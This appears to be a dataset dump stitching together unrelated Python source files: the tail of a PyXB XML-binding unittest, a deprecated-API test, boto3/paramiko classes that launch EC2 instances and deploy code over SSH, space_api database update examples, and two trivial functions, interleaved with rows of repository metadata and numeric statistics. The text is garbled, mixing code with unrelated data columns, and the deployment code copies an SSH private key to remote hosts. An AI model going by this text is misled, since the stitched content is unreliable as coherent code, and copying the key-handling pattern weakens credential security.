self.assertRaises(UnrecognizedContentError, wrapper.createFromDOM, dom.documentElement)
def testBasics (self):
xml = '<ns1:wrapper xmlns:ns1="URN:test-mg-sequence"><first/><second_opt/><third/><fourth_0_2/></ns1:wrapper>'
dom = pyxb.utils.domutils.StringToDOM(xml)
instance = wrapper.createFromDOM(dom.documentElement)
self.assert_(isinstance(instance.first, sequence._ElementMap['first'].elementBinding().typeDefinition()))
self.assert_(isinstance(instance.second_opt, sequence._ElementMap['second_opt'].elementBinding().typeDefinition()))
self.assert_(isinstance(instance.third, sequence._ElementMap['third'].elementBinding().typeDefinition()))
self.assert_(isinstance(instance.fourth_0_2, list))
self.assertEqual(1, len(instance.fourth_0_2))
self.assert_(isinstance(instance.fourth_0_2[0], sequence._ElementMap['fourth_0_2'].elementBinding().typeDefinition()))
self.assertEqual(xml, ToDOM(instance).toxml())
def testMultiplesAtEnd (self):
xml = '<ns1:wrapper xmlns:ns1="URN:test-mg-sequence"><first/><third/><fourth_0_2/><fourth_0_2/></ns1:wrapper>'
dom = pyxb.utils.domutils.StringToDOM(xml)
instance = wrapper.createFromDOM(dom.documentElement)
self.assert_(isinstance(instance.first, sequence._ElementMap['first'].elementBinding().typeDefinition()))
self.assert_(instance.second_opt is None)
self.assert_(isinstance(instance.third, sequence._ElementMap['third'].elementBinding().typeDefinition()))
self.assert_(isinstance(instance.fourth_0_2, list))
self.assertEqual(2, len(instance.fourth_0_2))
self.assert_(isinstance(instance.fourth_0_2[0], sequence._ElementMap['fourth_0_2'].elementBinding().typeDefinition()))
self.assertEqual(xml, ToDOM(instance).toxml())
def testMultiplesInMiddle (self):
xml = '<ns1:altwrapper xmlns:ns1="URN:test-mg-sequence"><first/><second_multi/><second_multi/><third/></ns1:altwrapper>'
dom = pyxb.utils.domutils.StringToDOM(xml)
instance = altwrapper.createFromDOM(dom.documentElement)
self.assert_(isinstance(instance.first, list))
self.assertEqual(1, len(instance.first))
self.assertEqual(2, len(instance.second_multi))
self.assert_(isinstance(instance.third, altsequence._ElementMap['third'].elementBinding().typeDefinition()))
self.assertEqual(xml, ToDOM(instance).toxml())
def testMultiplesAtStart (self):
xml = '<ns1:altwrapper xmlns:ns1="URN:test-mg-sequence"><first/><first/><third/></ns1:altwrapper>'
dom = pyxb.utils.domutils.StringToDOM(xml)
instance = altwrapper.createFromDOM(dom.documentElement)
self.assert_(isinstance(instance.first, list))
self.assertEqual(2, len(instance.first))
self.assertEqual(0, len(instance.second_multi))
self.assert_(isinstance(instance.third, altsequence._ElementMap['third'].elementBinding().typeDefinition()))
self.assertEqual(xml, ToDOM(instance).toxml())
instance = altwrapper(first=[ altsequence._ElementMap['first'].elementBinding()(), altsequence._ElementMap['first'].elementBinding()() ], third=altsequence._ElementMap['third'].elementBinding()())
self.assertEqual(xml, ToDOM(instance).toxml())
def testMissingInMiddle (self):
xml = '<ns1:wrapper xmlns:ns1="URN:test-mg-sequence"><first/><third/></ns1:wrapper>'
dom = pyxb.utils.domutils.StringToDOM(xml)
instance = wrapper.createFromDOM(dom.documentElement)
self.assert_(isinstance(instance.first, sequence._ElementMap['first'].elementBinding().typeDefinition()))
self.assert_(instance.second_opt is None)
self.assert_(isinstance(instance.third, sequence._ElementMap['third'].elementBinding().typeDefinition()))
self.assert_(isinstance(instance.fourth_0_2, list))
self.assertEqual(0, len(instance.fourth_0_2))
self.assertEqual(xml, ToDOM(instance).toxml())
def testMissingAtStart (self):
xml = '<ns1:altwrapper xmlns:ns1="URN:test-mg-sequence"><third/></ns1:altwrapper>'
dom = pyxb.utils.domutils.StringToDOM(xml)
self.assertRaises(UnrecognizedContentError, altwrapper.createFromDOM, dom.documentElement)
instance = altwrapper(third=altsequence._ElementMap['third'].elementBinding()())
self.assertRaises(pyxb.DOMGenerationError, ToDOM, instance)
def testMissingAtEndLeadingContent (self):
xml = '<ns1:altwrapper xmlns:ns1="URN:test-mg-sequence"><first/></ns1:altwrapper>'
dom = pyxb.utils.domutils.StringToDOM(xml)
self.assertRaises(MissingContentError, altwrapper.createFromDOM, dom.documentElement)
def testMissingAtEndNoContent (self):
xml = '<ns1:altwrapper xmlns:ns1="URN:test-mg-sequence"></ns1:altwrapper>'
dom = pyxb.utils.domutils.StringToDOM(xml)
self.assertRaises(MissingContentError, altwrapper.createFromDOM, dom.documentElement)
def testTooManyAtEnd (self):
xml = '<ns1:wrapper xmlns:ns1="URN:test-mg-sequence"><first/><third/><fourth_0_2/><fourth_0_2/><fourth_0_2/></ns1:wrapper>'
dom = pyxb.utils.domutils.StringToDOM(xml)
self.assertRaises(ExtraContentError, wrapper.createFromDOM, dom.documentElement)
def testTooManyAtStart (self):
xml = '<ns1:altwrapper xmlns:ns1="URN:test-mg-sequence"><first/><first/><first/><third/></ns1:altwrapper>'
dom = pyxb.utils.domutils.StringToDOM(xml)
self.assertRaises(UnrecognizedContentError, altwrapper.createFromDOM, dom.documentElement)
instance = altwrapper(first=[ altsequence._ElementMap['first'].elementBinding()(), altsequence._ElementMap['first'].elementBinding()(), altsequence._ElementMap['first'].elementBinding()() ], third=altsequence._ElementMap['third'].elementBinding()())
self.assertRaises(pyxb.DOMGenerationError, ToDOM, instance)
def testTooManyInMiddle (self):
xml = '<ns1:altwrapper xmlns:ns1="URN:test-mg-sequence"><second_multi/><second_multi/><second_multi/><third/></ns1:altwrapper>'
dom = pyxb.utils.domutils.StringToDOM(xml)
self.assertRaises(UnrecognizedContentError, altwrapper.createFromDOM, dom.documentElement)
if __name__ == '__main__':
unittest.main()
| 57.186992
| 257
| 0.716093
| 761
| 7,034
| 6.48883
| 0.118265
| 0.036452
| 0.027542
| 0.090725
| 0.855812
| 0.830498
| 0.81207
| 0.797084
| 0.797084
| 0.791616
| 0
| 0.01303
| 0.138044
| 7,034
| 122
| 258
| 57.655738
| 0.801418
| 0.003839
| 0
| 0.47
| 1
| 0.11
| 0.183583
| 0.140328
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0.13
| false
| 0
| 0.07
| 0.01
| 0.22
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e569eca601a4f282655bd6ec07e9d5f155d21e87
| 194
|
py
|
Python
|
tests/utils/test_deprecated_api.py
|
lanSeFangZhou/tokenizer_tools
|
edd931ae86a6e381b57e50f8b59ae19d3151d26b
|
[
"MIT"
] | null | null | null |
tests/utils/test_deprecated_api.py
|
lanSeFangZhou/tokenizer_tools
|
edd931ae86a6e381b57e50f8b59ae19d3151d26b
|
[
"MIT"
] | null | null | null |
tests/utils/test_deprecated_api.py
|
lanSeFangZhou/tokenizer_tools
|
edd931ae86a6e381b57e50f8b59ae19d3151d26b
|
[
"MIT"
] | null | null | null |
from tokenizer_tools.utils.deprecated_api import deprecated_api
def test_deprecated_api():
@deprecated_api(deprecated_api)
def print_hello():
print("hello")
print_hello()
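For reference, a generic sketch of the decorator pattern the test exercises; this is not the tokenizer_tools implementation, and the name and warning format below are assumptions:

import functools
import warnings

def deprecated_api_sketch(replacement):
    """Warn that the wrapped callable is deprecated, then delegate to it."""
    def decorator(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            warnings.warn(
                "%s is deprecated; use %s instead"
                % (func.__name__, getattr(replacement, '__name__', replacement)),
                DeprecationWarning,
                stacklevel=2,
            )
            return func(*args, **kwargs)
        return wrapper
    return decorator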
| 19.4
| 63
| 0.737113
| 24
| 194
| 5.583333
| 0.458333
| 0.485075
| 0.238806
| 0.38806
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.175258
| 194
| 9
| 64
| 21.555556
| 0.8375
| 0
| 0
| 0
| 0
| 0
| 0.025773
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.166667
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
e56b44a8afcd48da704f649cf08548600a2fb15d
| 12,200
|
py
|
Python
|
02_service/instance.py
|
Eudaemonal/AWS
|
d87144dbc13fcaab57e360f271cc7c55f66f4c3b
|
[
"MIT"
] | null | null | null |
02_service/instance.py
|
Eudaemonal/AWS
|
d87144dbc13fcaab57e360f271cc7c55f66f4c3b
|
[
"MIT"
] | null | null | null |
02_service/instance.py
|
Eudaemonal/AWS
|
d87144dbc13fcaab57e360f271cc7c55f66f4c3b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
import boto3
import json
import uuid
import sys
import paramiko
import logging
import os
import time
import argparse
import datetime
class Instance:
def __init__(self, session, configs):
self.session = session
self.region = configs['basic_config']['configure']['region']
self.ssh_key_file = configs['basic_config']['remote']['ssh_key_file']
self.image_id = configs['basic_config']['remote']['image_id']
self.instance_type = configs['basic_config']['remote']['instance_type']
self.security_group = configs['basic_config']['security_group']['name']
self.ssh_wait_time = configs['basic_config']['remote']['ssh_wait_time']
self.deploy_file = configs['basic_config']['remote']['deploy_file']
self.deploy_directory = configs['basic_config']['remote']['deploy_directory']
self.remote_username = configs['basic_config']['remote']['username']
self.corn_execution_interval = configs['basic_config']['remote']['execution_interval']
def run(self, cleanup_info):
ec2 = self.session.resource('ec2', region_name=self.region)
sshkey_path = self.ssh_key_file
sshkey_name = sshkey_path.split('/')[-1].split('.')[0]
self.instance = ec2.create_instances(
ImageId=self.image_id,
MinCount=1,
MaxCount=1,
InstanceType=self.instance_type,
KeyName=sshkey_name,
SecurityGroups=[self.security_group]
)[0]
self.instance.wait_until_running()
self.instance.load()
self.public_dns_name = self.instance.public_dns_name
cleanup_info['instance_id'] = self.instance.instance_id
cleanup_info['remote_deploy_file'] = self.deploy_file
logging.info('successfully launch ec2 instance')
return self.public_dns_name
def config(self):
# configure the ec2 instance
os.system("tar -zcvf %s %s > /dev/null 2>&1" %
(self.deploy_file,
self.deploy_directory))
os.system("scp -o 'StrictHostKeyChecking no' -i %s %s %s@%s:~/ > /dev/null 2>&1" %
(self.ssh_key_file,
self.deploy_file,
self.remote_username,
self.public_dns_name))
os.system("scp -o 'StrictHostKeyChecking no' -i %s %s %s@%s:~/ > /dev/null 2>&1" %
(self.ssh_key_file,
self.ssh_key_file,
self.remote_username,
self.public_dns_name))
# ssh to remote, run necessary setup and start cron job
paramiko_private_key = paramiko.RSAKey.from_private_key_file(self.ssh_key_file)
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(hostname=self.public_dns_name,
username=self.remote_username,
pkey=paramiko_private_key)
# unzip the codes on ec2 instance
unzip_cmd = 'tar xvfz %s' % (self.deploy_file)
stdin, stdout, stderr = ssh.exec_command(unzip_cmd)
exit_status = stdout.channel.recv_exit_status()
# move codes in remote folder to home directory
move_cmd = 'mv %s/* ~/' % (self.deploy_directory)
stdin, stdout, stderr = ssh.exec_command(move_cmd)
exit_status = stdout.channel.recv_exit_status()
# install dependency on ec2 instance
install_dependency_cmd = 'bash install.sh'
stdin, stdout, stderr = ssh.exec_command(install_dependency_cmd)
exit_status = stdout.channel.recv_exit_status()
# setup ec2 instance and start running
setup_cmd = 'nohup bash setup.sh &'
stdin, stdout, stderr = ssh.exec_command(setup_cmd)
exit_status = stdout.channel.recv_exit_status()
# start the cron job
#cron_cmd = "echo '*/{} * * * * {}' > cronjob; crontab cronjob; rm cronjob;".format(\
# self.corn_execution_interval,\
# "sudo python3 application.py")
#stdin, stdout, stderr = ssh.exec_command(cron_cmd)
#exit_status = stdout.channel.recv_exit_status()
# close the connection once the job is done
ssh.close()
except Exception as e:
print(e)
sys.exit()
def create_image(self, name):
image = self.instance.create_image(Name=name)
image.wait_until_exists()
return image.id
class ClientInstance(Instance):
def __init__(self, session, configs):
self.session = session
self.region = configs['basic_config']['configure']['region']
self.ssh_key_file = configs['basic_config']['remote']['ssh_key_file']
self.image_id = configs['basic_config']['remote']['image_id']
self.instance_type = configs['basic_config']['remote']['instance_type']
self.security_group = configs['basic_config']['security_group']['name']
self.ssh_wait_time = configs['basic_config']['remote']['ssh_wait_time']
self.remote_username = configs['basic_config']['remote']['username']
self.deploy_file = configs['client_config']['deploy_file']
self.deploy_directory = configs['client_config']['deploy_directory']
self.corn_execution_interval = configs['basic_config']['remote']['execution_interval']
def run(self, cleanup_info):
ec2 = self.session.resource('ec2', region_name=self.region)
sshkey_path = self.ssh_key_file
sshkey_name = sshkey_path.split('/')[-1].split('.')[0]
self.instance = ec2.create_instances(
ImageId=self.image_id,
MinCount=1,
MaxCount=1,
InstanceType=self.instance_type,
KeyName=sshkey_name,
SecurityGroups=[self.security_group]
)[0]
self.instance.wait_until_running()
self.instance.load()
self.public_dns_name = self.instance.public_dns_name
cleanup_info['client_instance_id'] = self.instance.instance_id
cleanup_info['client_deploy_file'] = self.deploy_file
logging.info('successfully launch client instance')
return self.public_dns_name
class ServiceInstance(Instance):
def __init__(self, session, configs):
self.session = session
self.region = configs['basic_config']['configure']['region']
self.ssh_key_file = configs['basic_config']['remote']['ssh_key_file']
self.image_id = configs['basic_config']['remote']['image_id']
self.instance_type = configs['basic_config']['remote']['instance_type']
self.security_group = configs['basic_config']['security_group']['name']
self.ssh_wait_time = configs['basic_config']['remote']['ssh_wait_time']
self.remote_username = configs['basic_config']['remote']['username']
self.deploy_file = configs['service_config']['deploy_file']
self.deploy_directory = configs['service_config']['deploy_directory']
self.corn_execution_interval = configs['basic_config']['remote']['execution_interval']
def run(self, cleanup_info):
ec2 = self.session.resource('ec2', region_name=self.region)
sshkey_path = self.ssh_key_file
sshkey_name = sshkey_path.split('/')[-1].split('.')[0]
self.instance = ec2.create_instances(
ImageId=self.image_id,
MinCount=1,
MaxCount=1,
InstanceType=self.instance_type,
KeyName=sshkey_name,
SecurityGroups=[self.security_group]
)[0]
self.instance.wait_until_running()
self.instance.load()
self.public_dns_name = self.instance.public_dns_name
cleanup_info['service_instance_id'] = self.instance.instance_id
cleanup_info['service_deploy_file'] = self.deploy_file
logging.info('successfully launch service instance')
return self.public_dns_name
def config(self):
# configure the ec2 instance
os.system("tar -zcvf %s %s > /dev/null 2>&1" %
(self.deploy_file,
self.deploy_directory))
os.system("scp -o 'StrictHostKeyChecking no' -i %s %s %s@%s:~/ > /dev/null 2>&1" %
(self.ssh_key_file,
self.deploy_file,
self.remote_username,
self.public_dns_name))
os.system("scp -o 'StrictHostKeyChecking no' -i %s %s %s@%s:~/ > /dev/null 2>&1" %
(self.ssh_key_file,
self.ssh_key_file,
self.remote_username,
self.public_dns_name))
# ssh to remote, run necessary setup and start cron job
paramiko_private_key = paramiko.RSAKey.from_private_key_file(self.ssh_key_file)
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(hostname=self.public_dns_name,
username=self.remote_username,
pkey=paramiko_private_key)
# unzip the codes on ec2 instance
unzip_cmd = 'tar xvfz %s' % (self.deploy_file)
stdin, stdout, stderr = ssh.exec_command(unzip_cmd)
exit_status = stdout.channel.recv_exit_status()
# move codes in remote folder to home directory
move_cmd = 'mv %s/* ~/' % (self.deploy_directory)
stdin, stdout, stderr = ssh.exec_command(move_cmd)
exit_status = stdout.channel.recv_exit_status()
# install dependency on ec2 instance
install_dependency_cmd = 'bash install.sh'
stdin, stdout, stderr = ssh.exec_command(install_dependency_cmd)
exit_status = stdout.channel.recv_exit_status()
# use crontab to ensure one service process running
cron_cmd = "echo '*/{} * * * * {}' > cronjob; crontab cronjob; rm cronjob;".format(\
self.corn_execution_interval,\
'pgrep -n "service.py" || /usr/bin/python3 service.py')
stdin, stdout, stderr = ssh.exec_command(cron_cmd)
exit_status = stdout.channel.recv_exit_status()
# close the connection once the job is done
ssh.close()
except Exception as e:
print(e)
sys.exit()
class WatchdogInstance(Instance):
def __init__(self, session, configs):
self.session = session
self.region = configs['basic_config']['configure']['region']
self.ssh_key_file = configs['basic_config']['remote']['ssh_key_file']
self.image_id = configs['basic_config']['remote']['image_id']
self.instance_type = configs['basic_config']['remote']['instance_type']
self.security_group = configs['basic_config']['security_group']['name']
self.ssh_wait_time = configs['basic_config']['remote']['ssh_wait_time']
self.remote_username = configs['basic_config']['remote']['username']
self.deploy_file = configs['watchdog_config']['deploy_file']
self.deploy_directory = configs['watchdog_config']['deploy_directory']
self.corn_execution_interval = configs['basic_config']['remote']['execution_interval']
def run(self, cleanup_info):
ec2 = self.session.resource('ec2', region_name=self.region)
sshkey_path = self.ssh_key_file
sshkey_name = sshkey_path.split('/')[-1].split('.')[0]
self.instance = ec2.create_instances(
ImageId=self.image_id,
MinCount=1,
MaxCount=1,
InstanceType=self.instance_type,
KeyName=sshkey_name,
SecurityGroups=[self.security_group]
)[0]
self.instance.wait_until_running()
self.instance.load()
self.public_dns_name = self.instance.public_dns_name
cleanup_info['watchdog_instance_id'] = self.instance.instance_id
cleanup_info['watchdog_deploy_file'] = self.deploy_file
logging.info('successfully launch watchdog instance')
return self.public_dns_name
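A minimal driver sketch for the classes above (not part of the module): the config file name and JSON layout are assumptions, though the keys mirror what the constructors read.

if __name__ == '__main__':
    import json
    import boto3

    with open('config.json') as fp:  # hypothetical config path
        configs = json.load(fp)

    session = boto3.Session(
        region_name=configs['basic_config']['configure']['region'])
    cleanup_info = {}

    # Launch a service instance, deploy the code over SSH, then report its DNS name.
    service = ServiceInstance(session, configs)
    public_dns = service.run(cleanup_info)
    service.config()
    logging.info('service reachable at %s', public_dns)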
| 40.397351
| 97
| 0.62377
| 1,418
| 12,200
| 5.093794
| 0.110014
| 0.056486
| 0.084729
| 0.086391
| 0.920116
| 0.912225
| 0.898657
| 0.876644
| 0.847293
| 0.81102
| 0
| 0.006195
| 0.259016
| 12,200
| 301
| 98
| 40.531561
| 0.79281
| 0.069836
| 0
| 0.798165
| 0
| 0.018349
| 0.178543
| 0.00777
| 0
| 0
| 0
| 0
| 0
| 1
| 0.050459
| false
| 0
| 0.045872
| 0
| 0.137615
| 0.009174
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e56bbe934b8131b53199c3e8d42c0b1fc7580ad5
| 6,966
|
py
|
Python
|
examples/update.py
|
AliabbasMerchant/space-api-python
|
e5f047d567540d503be7fe72e82f2b198e48b5f9
|
[
"Apache-2.0"
] | 8
|
2019-04-02T06:06:45.000Z
|
2019-11-12T16:53:26.000Z
|
examples/update.py
|
SaiprasadDuduka/space-api-python
|
278ad650fa5579089a7ff465dbe74ec5469940ae
|
[
"Apache-2.0"
] | 28
|
2019-03-25T11:35:07.000Z
|
2020-05-11T05:10:00.000Z
|
examples/update.py
|
SaiprasadDuduka/space-api-python
|
278ad650fa5579089a7ff465dbe74ec5469940ae
|
[
"Apache-2.0"
] | 4
|
2019-03-22T17:09:22.000Z
|
2019-10-24T17:10:43.000Z
|
# UPDATE
from space_api import API, AND, OR, COND
api = API("books-app", "localhost:4124")
db = api.my_sql()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update("books").where(condition).set({"name": "A book"}).apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE ONE
from space_api import API, AND, OR, COND
api = API("books-app", "localhost:4124")
db = api.my_sql()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update_one("books").where(condition).set({"name": "A book"}).apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE CONDITION
from space_api import API, AND, OR, COND
api = API("books-app", "localhost:4124")
db = api.my_sql()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update("books").where(condition).set({"name": "A book"}).apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE MULTIPLE CONDITIONS
from space_api import API, AND, OR, COND
api = API("books-app", "localhost:4124")
db = api.my_sql()
# The condition to be matched
condition = AND(COND("author", "==", "author1"), COND("name", "==", "someBook"))
# Update the books
response = db.update("books").where(condition).set({"name": "A book"}).apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE SET
from space_api import API, AND, OR, COND
api = API("books-app", "localhost:4124")
db = api.my_sql()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update("books").where(condition).set({"name": "A book"}).apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE UPSERT
from space_api import API, COND
api = API("books-app", "localhost:4124")
db = api.mongo()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.upsert("books").where(condition).set({"name": "A book"}).apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE PUSH
from space_api import API, COND
api = API("books-app", "localhost:4124")
db = api.mongo()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update("books").where(condition).push({"name": "A book"}).apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE REMOVE
from space_api import API, COND
api = API("books-app", "localhost:4124")
db = api.mongo()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update("books").where(condition).remove("author").apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE RENAME
from space_api import API, COND
api = API("books-app", "localhost:4124")
db = api.mongo()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update("books").where(condition).rename({"writer":"author"}).apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE INC
from space_api import API, COND
api = API("books-app", "localhost:4124")
db = api.mongo()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update("books").where(condition).inc({"likes":1}).apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE MUL
from space_api import API, COND
api = API("books-app", "localhost:4124")
db = api.mongo()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update("books").where(condition).mul({"likes":10}).apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE MAX
from space_api import API, COND
api = API("books-app", "localhost:4124")
db = api.mongo()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update("books").where(condition).max({"likes":100}).apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE MIN
from space_api import API, COND
api = API("books-app", "localhost:4124")
db = api.mongo()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update("books").where(condition).min({"likes":100}).apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE CURRENT TIMESTAMP
from space_api import API, COND
api = API("books-app", "localhost:4124")
db = api.mongo()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update("books").where(condition).current_timestamp("last_read").apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE CURRENT DATE
from space_api import API, COND
api = API("books-app", "localhost:4124")
db = api.mongo()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update("books").where(condition).current_date("last_read").apply()
if response.status == 200:
print("Success")
else:
print(response.error)
| 25.992537
| 102
| 0.53474
| 765
| 6,966
| 4.836601
| 0.077124
| 0.036486
| 0.048649
| 0.072973
| 0.948378
| 0.948378
| 0.948378
| 0.948378
| 0.948378
| 0.948378
| 0
| 0.021092
| 0.122021
| 6,966
| 267
| 103
| 26.089888
| 0.583878
| 0.330749
| 0
| 0.911111
| 0
| 0
| 0.193394
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0.222222
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e5b3342f950ee5a7d053852cfdf8506f647c94a9
| 70
|
py
|
Python
|
codes/test.py
|
bhuiyanmobasshir94/Apache-Airflow-Starter
|
25c5a00cb0206cc2f518b453ed2cebfa07a86892
|
[
"Apache-2.0"
] | 2
|
2022-01-02T11:35:51.000Z
|
2022-01-02T11:35:54.000Z
|
codes/test.py
|
bhuiyanmobasshir94/Apache-Airflow-Starter
|
25c5a00cb0206cc2f518b453ed2cebfa07a86892
|
[
"Apache-2.0"
] | null | null | null |
codes/test.py
|
bhuiyanmobasshir94/Apache-Airflow-Starter
|
25c5a00cb0206cc2f518b453ed2cebfa07a86892
|
[
"Apache-2.0"
] | null | null | null |
def add(a=1, b=2):
return a+b
def sub(a=5, b=2):
return a-b
| 10
| 18
| 0.514286
| 18
| 70
| 2
| 0.5
| 0.111111
| 0.444444
| 0.5
| 0.555556
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08
| 0.285714
| 70
| 6
| 19
| 11.666667
| 0.64
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|